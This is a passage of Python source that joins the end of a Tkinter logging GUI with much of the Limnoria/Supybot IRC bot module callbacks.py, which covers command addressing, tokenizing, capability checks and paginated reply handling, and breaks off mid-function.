threading.Thread(target=logger_gui.progressbar_app, args=(window_title,)).start()
return
class TextHandler(logging.Handler):
# This class allows you to log to a Tkinter Text or ScrolledText widget
# Adapted from Moshe Kaplan: https://gist.github.com/moshekaplan/c425f861de7bbf28ef06
def __init__(self, text):
# run the regular Handler __init__
logging.Handler.__init__(self)
# Store a reference to the Text it will log to
self.text = text
def emit(self, record):
msg = self.format(record)
def append():
self.text.configure(state='normal')
self.text.insert(tk.END, msg + '\n')
self.text.configure(state='disabled')
# Autoscroll to the bottom
self.text.yview(tk.END)
# This is necessary because we can't modify the Text from other threads
self.text.after(0, append)
class myGUI(tk.Frame):
# This class defines the graphical user interface
def __init__(self, parent, *args, **kwargs):
tk.Frame.__init__(self, parent, *args, **kwargs)
self.root = parent
self.build_gui()
def build_gui(self):
# Build GUI
self.root.title('TEST')
self.root.option_add('*tearOff', 'FALSE')
self.grid(column=0, row=0, sticky='ew')
self.grid_columnconfigure(0, weight=1, uniform='a')
self.grid_columnconfigure(1, weight=1, uniform='a')
self.grid_columnconfigure(2, weight=1, uniform='a')
self.grid_columnconfigure(3, weight=1, uniform='a')
#self.grid_columnconfigure(4, weight=1, uniform='a')
#self.grid_columnconfigure(5, weight=1, uniform='a')
# Add text widget to display logging info
st = ScrolledText.ScrolledText(self, state='disabled', width=110)
st.configure(font='TkFixedFont')
st.grid(column=0, row=1, sticky='w', columnspan=4)
# Create textLogger
text_handler = TextHandler(st)
# Logging configuration
logging.basicConfig(filename='test.log',
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s')
# Add the handler to logger
logger = logging.getLogger()
logger.addHandler(text_handler)
# from classes import datalogger
# import json_api
#
#
# json_filename = r"D:\Python\Tensorflow\Neural_Networks\Image Classifier\Generic_Classifier\main.json"
# json_obj = json_api.read_json(json_filename)
# datalogger_obj = datalogger.datalogger(json_obj['datalog_dir'])
# print(datalogger_obj.datalog_filepath)
# print(datalogger_obj.datalog_dir)
# datalogger_obj.set_log('category', 'sub_category', 'log_string')
# print("File size : "+ str(datalogger_obj.get_file_size())+' bytes')
# print(datalogger_obj.get_log(3))
|
callbacks.py
|
# -*- coding: utf8 -*-
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# Copyright (c) 2014, James McCoy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
This module contains the basic callbacks for handling PRIVMSGs.
"""
import re
import copy
import time
from . import shlex
import codecs
import getopt
import inspect
import warnings
from . import (conf, ircdb, irclib, ircmsgs, ircutils, log, registry,
utils, world)
from .utils import minisix
from .utils.iter import any, all
from .i18n import PluginInternationalization
_ = PluginInternationalization()
def _addressed(irc, msg, prefixChars=None, nicks=None,
prefixStrings=None, whenAddressedByNick=None,
whenAddressedByNickAtEnd=None, payload=None):
"""Determines whether this message is a command to the bot (because of a
prefix char/string, or because the bot's nick is used as prefix, or because
it's a private message, etc.).
Returns the actual content of the command (ie. the content of the message,
stripped of the prefix that was used to determine if it's addressed).
If 'payload' is not None, its value is used instead of msg.args[1] as the
content of the message."""
if isinstance(irc, str):
warnings.warn(
"callbacks.addressed's first argument should now be be the Irc "
"object instead of the bot's nick.",
DeprecationWarning)
network = None
nick = irc
else:
network = irc.network
nick = irc.nick
def get(group):
v = group.getSpecific(network=network, channel=msg.channel)
return v()
def stripPrefixStrings(payload):
for prefixString in prefixStrings:
if payload.startswith(prefixString):
payload = payload[len(prefixString):].lstrip()
return payload
assert msg.command in ('PRIVMSG', 'TAGMSG')
target = msg.channel or msg.args[0]
if not payload:
payload = msg.args[1]
if not payload:
return ''
if prefixChars is None:
prefixChars = get(conf.supybot.reply.whenAddressedBy.chars)
if whenAddressedByNick is None:
whenAddressedByNick = get(conf.supybot.reply.whenAddressedBy.nick)
if whenAddressedByNickAtEnd is None:
r = conf.supybot.reply.whenAddressedBy.nick.atEnd
whenAddressedByNickAtEnd = get(r)
if prefixStrings is None:
prefixStrings = get(conf.supybot.reply.whenAddressedBy.strings)
# We have to check this before nicks -- try "@google supybot" with supybot
# and whenAddressedBy.nick.atEnd on to see why.
if any(payload.startswith, prefixStrings):
return stripPrefixStrings(payload)
elif payload[0] in prefixChars:
return payload[1:].strip()
if nicks is None:
nicks = get(conf.supybot.reply.whenAddressedBy.nicks)
nicks = list(map(ircutils.toLower, nicks))
else:
nicks = list(nicks) # Just in case.
nicks.insert(0, ircutils.toLower(nick))
# Ok, let's see if it's a private message.
if ircutils.nickEqual(target, nick):
payload = stripPrefixStrings(payload)
while payload and payload[0] in prefixChars:
payload = payload[1:].lstrip()
return payload
# Ok, not private. Does it start with our nick?
elif whenAddressedByNick:
for nick in nicks:
lowered = ircutils.toLower(payload)
if lowered.startswith(nick):
try:
(maybeNick, rest) = payload.split(None, 1)
toContinue = False
while not ircutils.isNick(maybeNick, strictRfc=True):
if maybeNick[-1].isalnum():
toContinue = True
break
maybeNick = maybeNick[:-1]
if toContinue:
continue
if ircutils.nickEqual(maybeNick, nick):
return rest
else:
continue
except ValueError: # split didn't work.
continue
elif whenAddressedByNickAtEnd and lowered.endswith(nick):
rest = payload[:-len(nick)]
possiblePayload = rest.rstrip(' \t,;')
if possiblePayload != rest:
# There should be some separator between the nick and the
# previous alphanumeric character.
return possiblePayload
if get(conf.supybot.reply.whenNotAddressed):
return payload
else:
return ''
def addressed(irc, msg, **kwargs):
"""If msg is addressed to 'name', returns the portion after the address.
Otherwise returns the empty string.
"""
payload = msg.addressed
if payload is not None:
return payload
else:
payload = _addressed(irc, msg, **kwargs)
msg.tag('addressed', payload)
return payload
def canonicalName(command, preserve_spaces=False):
"""Turn a command into its canonical form.
Currently, this makes everything lowercase and removes all dashes and
underscores.
"""
if minisix.PY2 and isinstance(command, unicode):
command = command.encode('utf-8')
elif minisix.PY3 and isinstance(command, bytes):
command = command.decode()
special = '\t-_'
if not preserve_spaces:
special += ' '
reAppend = ''
while command and command[-1] in special:
reAppend = command[-1] + reAppend
command = command[:-1]
return ''.join([x for x in command if x not in special]).lower() + reAppend
def reply(*args, **kwargs):
warnings.warn('callbacks.reply is deprecated. Use irc.reply instead.',
DeprecationWarning)
return _makeReply(dynamic.irc, *args, **kwargs)
def _makeReply(irc, msg, s,
prefixNick=None, private=None,
notice=None, to=None, action=None, error=False,
stripCtcp=True):
msg.tag('repliedTo')
# Ok, let's make the target:
# XXX This isn't entirely right. Consider to=#foo, private=True.
target = ircutils.replyTo(msg)
def isPublic(s):
return irc.isChannel(irc.stripChannelPrefix(s))
if to is not None and isPublic(to):
target = to
if isPublic(target):
channel = irc.stripChannelPrefix(target)
else:
channel = None
if notice is None:
notice = conf.get(conf.supybot.reply.withNotice,
channel=channel, network=irc.network)
if private is None:
private = conf.get(conf.supybot.reply.inPrivate,
channel=channel, network=irc.network)
if prefixNick is None:
prefixNick = conf.get(conf.supybot.reply.withNickPrefix,
channel=channel, network=irc.network)
if error:
notice =conf.get(conf.supybot.reply.error.withNotice,
channel=channel, network=irc.network) or notice
private=conf.get(conf.supybot.reply.error.inPrivate,
channel=channel, network=irc.network) or private
s = _('Error: ') + s
if private:
prefixNick = False
if to is None:
target = msg.nick
else:
target = to
if action:
prefixNick = False
if to is None:
to = msg.nick
if stripCtcp:
s = s.strip('\x01')
# Ok, now let's make the payload:
s = ircutils.safeArgument(s)
if not s and not action:
s = _('Error: I tried to send you an empty message.')
if prefixNick and isPublic(target):
# Let's may sure we don't do, "#channel: foo.".
if not isPublic(to):
s = '%s: %s' % (to, s)
if not isPublic(target):
if conf.supybot.reply.withNoticeWhenPrivate():
notice = True
# And now, let's decide whether it's a PRIVMSG or a NOTICE.
msgmaker = ircmsgs.privmsg
if notice:
msgmaker = ircmsgs.notice
# We don't use elif here because actions can't be sent as NOTICEs.
if action:
msgmaker = ircmsgs.action
# Finally, we'll return the actual message.
ret = msgmaker(target, s)
ret.tag('inReplyTo', msg)
if 'msgid' in msg.server_tags \
and conf.supybot.protocols.irc.experimentalExtensions() \
and 'message-tags' in irc.state.capabilities_ack:
# In theory, msgid being in server_tags implies message-tags was
# negotiated, but the +reply spec requires it explicitly. Plus, there's
# no harm in doing this extra check, in case a plugin is replying
# across network (as it may happen with '@network command').
ret.server_tags['+draft/reply'] = msg.server_tags['msgid']
return ret
def error(*args, **kwargs):
warnings.warn('callbacks.error is deprecated. Use irc.error instead.',
DeprecationWarning)
return _makeErrorReply(dynamic.irc, *args, **kwargs)
def _makeErrorReply(irc, msg, s, **kwargs):
"""Makes an error reply to msg with the appropriate error payload."""
kwargs['error'] = True
msg.tag('isError')
return _makeReply(irc, msg, s, **kwargs)
def getHelp(method, name=None, doc=None):
if name is None:
name = method.__name__
if doc is None:
if method.__doc__ is None:
doclines = ['This command has no help. Complain to the author.']
else:
doclines = method.__doc__.splitlines()
else:
doclines = doc.splitlines()
s = '%s %s' % (name, doclines.pop(0))
if doclines:
help = ' '.join(doclines)
s = '(%s) -- %s' % (ircutils.bold(s), help)
return utils.str.normalizeWhitespace(s)
def getSyntax(method, name=None, doc=None):
if name is None:
name = method.__name__
if doc is None:
doclines = method.__doc__.splitlines()
else:
doclines = doc.splitlines()
return '%s %s' % (name, doclines[0])
class Error(Exception):
"""Generic class for errors in Privmsg callbacks."""
pass
class ArgumentError(Error):
"""The bot replies with a help message when this is raised."""
pass
class SilentError(Error):
"""An error that we should not notify the user."""
pass
class Tokenizer(object):
# This will be used as a global environment to evaluate strings in.
# Evaluation is, of course, necessary in order to allow escaped
# characters to be properly handled.
#
# These are the characters valid in a token. Everything printable except
# double-quote, left-bracket, and right-bracket.
separators = '\x00\r\n \t'
def __init__(self, brackets='', pipe=False, quotes='"'):
if brackets:
self.separators += brackets
self.left = brackets[0]
self.right = brackets[1]
else:
self.left = ''
self.right = ''
self.pipe = pipe
if self.pipe:
self.separators += '|'
self.quotes = quotes
self.separators += quotes
def _handleToken(self, token):
if token[0] == token[-1] and token[0] in self.quotes:
token = token[1:-1]
# FIXME: No need to tell you this is a hack.
# It has to handle both IRC commands and serialized configuration.
#
# Whoever you are, if you make a single modification to this
# code, TEST the code with Python 2 & 3, both with the unit
# tests and on IRC with this: @echo "好"
if minisix.PY2:
try:
token = token.encode('utf8').decode('string_escape')
token = token.decode('utf8')
except:
token = token.decode('string_escape')
else:
token = codecs.getencoder('utf8')(token)[0]
token = codecs.getdecoder('unicode_escape')(token)[0]
try:
token = token.encode('iso-8859-1').decode()
except: # Prevent issue with tokens like '"\\x80"'.
pass
return token
def _insideBrackets(self, lexer):
ret = []
while True:
token = lexer.get_token()
if not token:
raise SyntaxError(_('Missing "%s". You may want to '
'quote your arguments with double '
'quotes in order to prevent extra '
'brackets from being evaluated '
'as nested commands.') % self.right)
elif token == self.right:
return ret
elif token == self.left:
ret.append(self._insideBrackets(lexer))
else:
ret.append(self._handleToken(token))
return ret
def tokenize(self, s):
lexer = shlex.shlex(minisix.io.StringIO(s))
lexer.commenters = ''
lexer.quotes = self.quotes
lexer.separators = self.separators
args = []
ends = []
while True:
token = lexer.get_token()
if not token:
break
elif token == '|' and self.pipe:
# The "and self.pipe" might seem redundant here, but it's there
# for strings like 'foo | bar', where a pipe stands alone as a
# token, but shouldn't be treated specially.
if not args:
raise SyntaxError(_('"|" with nothing preceding. I '
'obviously can\'t do a pipe with '
'nothing before the |.'))
ends.append(args)
args = []
elif token == self.left:
args.append(self._insideBrackets(lexer))
elif token == self.right:
raise SyntaxError(_('Spurious "%s". You may want to '
'quote your arguments with double '
'quotes in order to prevent extra '
'brackets from being evaluated '
'as nested commands.') % self.right)
else:
args.append(self._handleToken(token))
if ends:
if not args:
raise SyntaxError(_('"|" with nothing following. I '
'obviously can\'t do a pipe with '
'nothing after the |.'))
args.append(ends.pop())
while ends:
args[-1].append(ends.pop())
return args
def tokenize(s, channel=None, network=None):
"""A utility function to create a Tokenizer and tokenize a string."""
pipe = False
brackets = ''
nested = conf.supybot.commands.nested
if nested():
brackets = nested.brackets.getSpecific(network, channel)()
if conf.get(nested.pipeSyntax,
channel=channel, network=network): # No nesting, no pipe.
pipe = True
quotes = conf.supybot.commands.quotes.getSpecific(network, channel)()
try:
ret = Tokenizer(brackets=brackets,pipe=pipe,quotes=quotes).tokenize(s)
return ret
except ValueError as e:
raise SyntaxError(str(e))
def formatCommand(command):
return ' '.join(command)
def checkCommandCapability(msg, cb, commandName):
plugin = cb.name().lower()
if not isinstance(commandName, minisix.string_types):
assert commandName[0] == plugin, ('checkCommandCapability no longer '
'accepts command names that do not start with the callback\'s '
'name (%s): %s') % (plugin, commandName)
commandName = '.'.join(commandName)
def checkCapability(capability):
assert ircdb.isAntiCapability(capability)
if ircdb.checkCapability(msg.prefix, capability):
log.info('Preventing %s from calling %s because of %s.',
msg.prefix, commandName, capability)
raise RuntimeError(capability)
try:
antiCommand = ircdb.makeAntiCapability(commandName)
checkCapability(antiCommand)
checkAtEnd = [commandName]
default = conf.supybot.capabilities.default()
if msg.channel:
channel = msg.channel
checkCapability(ircdb.makeChannelCapability(channel, antiCommand))
chanCommand = ircdb.makeChannelCapability(channel, commandName)
checkAtEnd += [chanCommand]
default &= ircdb.channels.getChannel(channel).defaultAllow
return not (default or \
any(lambda x: ircdb.checkCapability(msg.prefix, x),
checkAtEnd))
except RuntimeError as e:
s = ircdb.unAntiCapability(str(e))
return s
class RichReplyMethods(object):
"""This is a mixin so these replies need only be defined once. It operates
under several assumptions, including the fact that 'self' is an Irc object
of some sort and there is a self.msg that is an IrcMsg."""
def __makeReply(self, prefix, s):
if s:
s = '%s %s' % (prefix, s)
else:
s = prefix
return ircutils.standardSubstitute(self, self.msg, s)
def _getConfig(self, wrapper):
return conf.get(wrapper,
channel=self.msg.channel, network=self.irc.network)
def replySuccess(self, s='', **kwargs):
r"""Replies with a success message, configurable with
``supybot.replies.success`` or the Success plugin.
:arg str s:
Text to append to the standard success message
:arg \**kwargs:
See :meth:`NestedCommandsIrcProxy.reply`'s keyword arguments
"""
v = self._getConfig(conf.supybot.replies.success)
if v:
s = self.__makeReply(v, s)
return self.reply(s, **kwargs)
else:
self.noReply()
def replyError(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.error)
if 'msg' in kwargs:
msg = kwargs['msg']
if ircdb.checkCapability(msg.prefix, 'owner'):
v = self._getConfig(conf.supybot.replies.errorOwner)
s = self.__makeReply(v, s)
return self.reply(s, **kwargs)
def _getTarget(self, to=None):
"""Compute the target according to self.to, the provided to,
and self.private, and return it. Mainly used by reply methods."""
# FIXME: Don't set self.to.
# I still set it to be sure I don't introduce a regression,
# but it does not make sense for .reply() and .replies() to
# change the state of this Irc object.
if to is not None:
self.to = self.to or to
if self.private:
target = to or self.msg.nick
elif self.msg.channel is None:
target = self.msg.nick
else:
target = self.to or self.msg.args[0]
return target
def replies(self, L, prefixer=None, joiner=None,
onlyPrefixFirst=False,
oneToOne=None, **kwargs):
if prefixer is None:
prefixer = ''
if joiner is None:
joiner = utils.str.commaAndify
if isinstance(prefixer, minisix.string_types):
prefixer = prefixer.__add__
if isinstance(joiner, minisix.string_types):
joiner = joiner.join
to = self._getTarget(kwargs.get('to'))
if oneToOne is None: # Can be True, False, or None
if self.irc.isChannel(to):
oneToOne = conf.get(conf.supybot.reply.oneToOne,
channel=to, network=self.irc.network)
else:
oneToOne = conf.supybot.reply.oneToOne()
if oneToOne:
return self.reply(prefixer(joiner(L)), **kwargs)
else:
msg = None
first = True
for s in L:
if onlyPrefixFirst:
if first:
first = False
msg = self.reply(prefixer(s), **kwargs)
else:
msg = self.reply(s, **kwargs)
else:
msg = self.reply(prefixer(s), **kwargs)
return msg
def noReply(self, msg=None):
self.repliedTo = True
def _error(self, s, Raise=False, **kwargs):
if Raise:
raise Error(s)
else:
return self.error(s, **kwargs)
def errorNoCapability(self, capability, s='', **kwargs):
if 'Raise' not in kwargs:
kwargs['Raise'] = True
log.warning('Denying %s for lacking %q capability.',
self.msg.prefix, capability)
# noCapability means "don't send a specific capability error
# message" not "don't send a capability error message at all", like
# one would think
if self._getConfig(conf.supybot.reply.error.noCapability) or \
capability in conf.supybot.capabilities.private():
v = self._getConfig(conf.supybot.replies.genericNoCapability)
else:
v = self._getConfig(conf.supybot.replies.noCapability)
try:
v %= capability
except TypeError: # No %s in string
pass
s = self.__makeReply(v, s)
if s:
return self._error(s, **kwargs)
elif kwargs['Raise']:
raise Error()
def errorPossibleBug(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.possibleBug)
if s:
s += ' (%s)' % v
else:
s = v
return self._error(s, **kwargs)
def errorNotRegistered(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.notRegistered)
return self._error(self.__makeReply(v, s), **kwargs)
def errorNoUser(self, s='', name='that user', **kwargs):
if 'Raise' not in kwargs:
kwargs['Raise'] = True
v = self._getConfig(conf.supybot.replies.noUser)
try:
v = v % name
except TypeError:
log.warning('supybot.replies.noUser should have one "%s" in it.')
return self._error(self.__makeReply(v, s), **kwargs)
def errorRequiresPrivacy(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.requiresPrivacy)
return self._error(self.__makeReply(v, s), **kwargs)
def errorInvalid(self, what, given=None, s='', repr=True, **kwargs):
if given is not None:
if repr:
given = _repr(given)
else:
given = '"%s"' % given
v = _('%s is not a valid %s.') % (given, what)
else:
v = _('That\'s not a valid %s.') % what
if 'Raise' not in kwargs:
kwargs['Raise'] = True
if s:
v += ' ' + s
return self._error(v, **kwargs)
_repr = repr
class ReplyIrcProxy(RichReplyMethods):
"""This class is a thin wrapper around an irclib.Irc object that gives it
the reply() and error() methods (as well as everything in RichReplyMethods,
based on those two)."""
_mores = ircutils.IrcDict()
def __init__(self, irc, msg):
self.irc = irc
self.msg = msg
self.getRealIrc()._setMsgChannel(self.msg)
def getRealIrc(self):
"""Returns the real irclib.Irc object underlying this proxy chain."""
if isinstance(self.irc, irclib.Irc):
return self.irc
else:
return self.irc.getRealIrc()
# This should make us be considered equal to our irclib.Irc object for
# hashing; an important thing (no more "too many open files" exceptions :))
def __hash__(self):
return hash(self.getRealIrc())
def __eq__(self, other):
return self.getRealIrc() == other
__req__ = __eq__
def __ne__(self, other):
return not (self == other)
__rne__ = __ne__
def error(self, s, msg=None, **kwargs):
if 'Raise' in kwargs and kwargs['Raise']:
raise Error()
if msg is None:
msg = self.msg
if s:
m = _makeErrorReply(self, msg, s, **kwargs)
self.irc.queueMsg(m)
return m
def _defaultPrefixNick(self, msg):
if msg.channel:
return conf.get(conf.supybot.reply.withNickPrefix,
channel=msg.channel, network=self.irc.network)
else:
return conf.supybot.reply.withNickPrefix()
def reply(self, s, msg=None, **kwargs):
"""
Keyword arguments:
:arg bool noLengthCheck:
True if the length shouldn't be checked (used for 'more' handling)
:arg bool prefixNick:
False if the nick shouldn't be prefixed to the reply.
:arg bool action:
True if the reply should be an action.
:arg bool private:
True if the reply should be in private.
:arg bool notice:
True if the reply should be noticed when the bot is configured
to do so.
:arg str to:
The nick or channel the reply should go to.
Defaults to msg.args[0] (or msg.nick if private)
:arg bool sendImmediately:
True if the reply should use sendMsg() which
bypasses conf.supybot.protocols.irc.throttleTime
and gets sent before any queued messages
"""
if msg is None:
msg = self.msg
assert not isinstance(s, ircmsgs.IrcMsg), \
'Old code alert: there is no longer a "msg" argument to reply.'
kwargs.pop('noLengthCheck', None)
if 'target' not in kwargs:
# TODO: deduplicate this with _getTarget
# TODO: it looks like 'target' is never in kwargs.
# (an old version of this code crashed when 'target' was
# not given, but no one complained). Remove the conditional?
if kwargs.get('private', False) or msg.channel is None:
kwargs['target'] = msg.nick
else:
kwargs['target'] = kwargs.get('to', None) or msg.args[0]
if 'prefixNick' not in kwargs:
kwargs['prefixNick'] = self._defaultPrefixNick(msg)
self._sendReply(s, msg=msg, **kwargs)
def __getattr__(self, attr):
return getattr(self.irc, attr)
def _replyOverhead(self, msg, **kwargs):
"""Returns the number of bytes added to a PRIVMSG payload, either by
Limnoria itself or by the server.
Ignores tag bytes, as they are accounted for separately."""
# FIXME: big hack.
# _makeReply does a lot of internal state computation, especially
# related to the final target to use.
# I tried to get them out of _makeReply but it's a clusterfuck, so I
# gave up. Instead, we call _makeReply with a dummy payload to guess
# what overhead it will add.
payload = 'foo'
channel = msg.channel
msg = copy.deepcopy(msg) # because _makeReply calls .tag('repliedTo')
msg.channel = channel # ugh... copy.deepcopy uses msg.__reduce__
reply_msg = _makeReply(self, msg, payload, **kwargs)
# strip tags, add prefix
reply_msg = ircmsgs.IrcMsg(
msg=reply_msg, server_tags={}, prefix=self.prefix)
return len(str(reply_msg)) - len(payload)
def _sendReply(self, s, target, msg, sendImmediately=False,
noLengthCheck=False, **kwargs):
if sendImmediately:
sendMsg = self.irc.sendMsg
else:
sendMsg = self.irc.queueMsg
if isinstance(self.irc, self.__class__):
s = s[:conf.supybot.reply.maximumLength()]
return self.irc.reply(s,
noLengthCheck=noLengthCheck,
**kwargs)
elif noLengthCheck:
# noLengthCheck only matters to NestedCommandsIrcProxy, so
# it's not used here. Just in case you were wondering.
m = _makeReply(self, msg, s, **kwargs)
sendMsg(m)
return m
else:
s = ircutils.safeArgument(s)
allowedLength = conf.get(conf.supybot.reply.mores.length,
channel=target, network=self.irc.network)
if not allowedLength: # 0 indicates this.
allowedLength = 512 - self._replyOverhead(msg, **kwargs)
maximumMores = conf.get(conf.supybot.reply.mores.maximum,
channel=target, network=self.irc.network)
maximumLength = allowedLength * maximumMores
if len(s) > maximumLength:
log.warning('Truncating to %s bytes from %s bytes.',
maximumLength, len(s))
s = s[:maximumLength]
s_size = len(s.encode()) if minisix.PY3 else len(s)
if s_size <= allowedLength or \
not conf.get(conf.supybot.reply.mores,
channel=target, network=self.irc.network):
# There's no need for action=self.action here because
# action implies noLengthCheck, which has already been
# handled. Let's stick an assert in here just in case.
assert not kwargs.get('action')
m = _makeReply(self, msg, s, **kwargs)
sendMsg(m)
return m
# The '(XX more messages)' may have not the same
# length in the current locale
allowedLength -= len(_('(XX more messages)')) + 1 # bold
chunks = ircutils.wrap(s, allowedLength)
# Last messages to display at the beginning of the list
# (which is used like a stack)
chunks.reverse()
instant = conf.get(conf.supybot.reply.mores.instant,
channel=target, network=self.irc.network)
# Big complex loop ahead, with lots of cases and opportunities for
# off-by-one errors. Here is the meaning of each of the variables
#
# * 'i' is the number of chunks after the current one
#
# * 'is_first' is True when the message is the very first message
# (so last iteration of the loop)
#
# * 'is_last' is True when the message is the very last (so first
# iteration of the loop)
#
# * 'is_instant' is True when the message is in one of the messages
# sent immediately when the command is called, ie. without
# calling @misc more. (when supybot.reply.mores.instant is 1,
# which is the default, this is equivalent to 'is_first')
#
# * 'is_last_instant' is True when the message is the last of the
# instant message (so the first iteration of the loop with an
# instant message).
#
# We need all this complexity because pagination is hard, and we
# want:
#
# * the '(XX more messages)' suffix on the last instant message,
# and every other message (mandatory, it's a great feature),
# but not on the other instant messages (mandatory when
# multiline is enabled, but very nice to have in general)
# * the nick prefix on the first message and every other message
# that isn't instant (mandatory), but not on the other instant
# messages (also mandatory only when multiline is enabled)
msgs = []
for (i, chunk) in enumerate(chunks):
is_first = i == len(chunks) - 1
is_last = i == 0
is_instant = len(chunks) - i <= instant
is_last_instant = len(chunks) - i == instant
if is_last:
# last message, no suffix to add
pass
elif is_instant and not is_last_instant:
# one of the first messages, and the next one will
# also be sent immediately, so no suffix
pass
else:
if i == 1:
more = _('more message')
else:
more = _('more messages')
n = ircutils.bold('(%i %s)' % (len(msgs), more))
chunk = '%s %s' % (chunk, n)
if is_instant and not is_first:
d = kwargs.copy()
d['prefixNick'] = False
msgs.append(_makeReply(self, msg, chunk, **d))
else:
msgs.append(_makeReply(self, msg, chunk, **kwargs))
instant_messages = []
while instant > 0 and msgs:
instant -= 1
response = msgs.pop()
instant_messages.append(response)
# XXX We should somehow allow these to be returned, but
# until someone complains, we'll be fine :) We
# can't return from here, though, for obvious
# reasons.
# return m
if conf.supybot.protocols.irc.experimentalExtensions() \
and 'draft/multiline' in self.state.capabilities_ack \
and len(instant_messages) > 1:
# More than one message to send now, and we are allowed to use
# multiline batches, so let's do it
self.queueMultilineBatches(
instant_messages, target, msg.nick, concat=True,
allowedLength=allowedLength, sendImmediately=sendImmediately)
else:
for instant_msg in instant_messages:
sendMsg(instant_msg)
if not msgs:
return
prefix = msg.prefix
if target and ircutils.isNick(target):
try:
state = self.getRealIrc().state
prefix = state.nickToHostmask(target)
except KeyError:
pass # We'll leave it as it is.
if '!' in prefix and '@' in prefix:
mask = prefix.split('!', 1)[1]
self._mores[mask] = msgs
public = bool(self.msg.channel)
private = kwargs.get('private', False) or not public
self._mores[msg.nick] = (private, msgs)
return response
def queueMultilineBatches(self, msgs, target, targetNick, concat,
allowedLength=0, sendImmediately=False):
"""Queues the msgs passed as argument in batches using draft/multiline
batches.
This errors if experimentalExtensions is disabled or draft/multiline
was not negotiated."""
assert conf.supybot.protocols.irc.experimentalExtensions()
assert 'draft/multiline' in self.state.capabilities_ack
if allowedLength: # 0 indicates this.
largest_msg_size = allowedLength
else:
# Used as upper bound of each message's size to decide how many
# messages to put in each batch.
largest_msg_size = max(len(msg.args[1]) for msg in msgs)
multiline_cap_values = ircutils.parseCapabilityKeyValue(
self.state.capabilities_ls['draft/multiline'])
# All the messages in instant_messages are to be sent
# immediately, in multiline batches.
max_bytes_per_batch = int(multiline_cap_values['max-bytes'])
# We have to honor max_bytes_per_batch, but I don't want to
# encode messages again here just to have their length, so
# let's assume they all have the maximum length.
# It's not optimal, but close enough and simplifies the code.
messages_per_batch = max_bytes_per_batch // largest_msg_size
# "Clients MUST NOT send tags other than draft/multiline-concat and
# batch on messages within the batch. In particular, all client-only
# tags associated with the message must be sent attached to the initial
# BATCH command."
# -- <https://ircv3.net/specs/extensions/multiline>
# So we copy the tags of the first message, discard the tags of all
# other messages, and apply the tags to the opening BATCH
server_tags = msgs[0].server_tags
for batch_msgs in utils.iter.grouper(msgs, messages_per_batch):
# TODO: should use sendBatch instead of queueBatch if
# sendImmediately is True
batch_name = ircutils.makeLabel()
batch = []
batch.append(ircmsgs.IrcMsg(command='BATCH',
args=('+' + batch_name, 'draft/multiline', target),
server_tags=server_tags))
for (i, batch_msg) in enumerate(batch_msgs):
if batch_msg is None:
continue # 'grouper' generates None at the end
assert 'batch' not in batch_msg.server_tags
# Discard the existing tags, and add the batch ones.
batch_msg.server_tags = {'batch': batch_name}
if concat and i > 0:
# Tell clients not to add a newline after this
batch_msg.server_tags['draft/multiline-concat'] = None
batch.append(batch_msg)
batch.append(ircmsgs.IrcMsg(
command='BATCH', args=('-' + batch_name,)))
self.queueBatch(batch)
SimpleProxy = ReplyIrcProxy # Backwards-compatibility
class NestedCommandsIrcProxy(ReplyIrcProxy):
"A proxy object to allow proper nesting of commands (even threaded ones)."
def __init__(self, irc, msg, args, nested=0):
assert isinstance(args, list), 'Args should be a list, not a string.'
super(NestedCommandsIrcProxy, self).__init__(irc, msg)
self.nested = nested
self.repliedTo = False
if not self.nested and isinstance(irc, self.__class__):
# This means we were given an NestedCommandsIrcProxy instead of an
# irclib.Irc, and so we're obviously nested. But nested wasn't
# set! So we take our given Irc's nested value.
self.nested += irc.nested
maxNesting = conf.supybot.commands.nested.maximum()
if maxNesting and self.nested > maxNesting:
log.warning('%s attempted more than %s levels of nesting.',
self.msg.prefix, maxNesting)
self.error(_('You\'ve attempted more nesting than is '
'currently allowed on this bot.'))
return
# The deepcopy here is necessary for Scheduler; it re-runs already
# tokenized commands. There's a possibility a simple copy[:] would
# work, but we're being careful.
self.args = copy.deepcopy(args)
self.counter = 0
self._resetReplyAttributes()
if not args:
self.finalEvaled = True
self._callInvalidCommands()
else:
self.finalEvaled = False
world.commandsProcessed += 1
self.evalArgs()
def __eq__(self, other):
return other == self.getRealIrc()
def __hash__(self):
return hash(self.getRealIrc())
def _resetReplyAttributes(self):
self.to = None
self.action = None
self.notice = None
self.private = None
self.noLengthCheck = None
self.prefixNick = self._defaultPrefixNick(self.msg)
def evalArgs(self, withClass=None):
while self.counter < len(self.args):
self.repliedTo = False
if isinstance(self.args[self.counter], minisix.string_types):
# If it's a string, just go to the next arg. There is no
# evaluation to be done for strings. If, at some point,
# we decided to, say, convert every string using
# ircutils.standardSubstitute, this would be where we would
# probably put it.
self.counter += 1
else:
assert isinstance(self.args[self.counter], list)
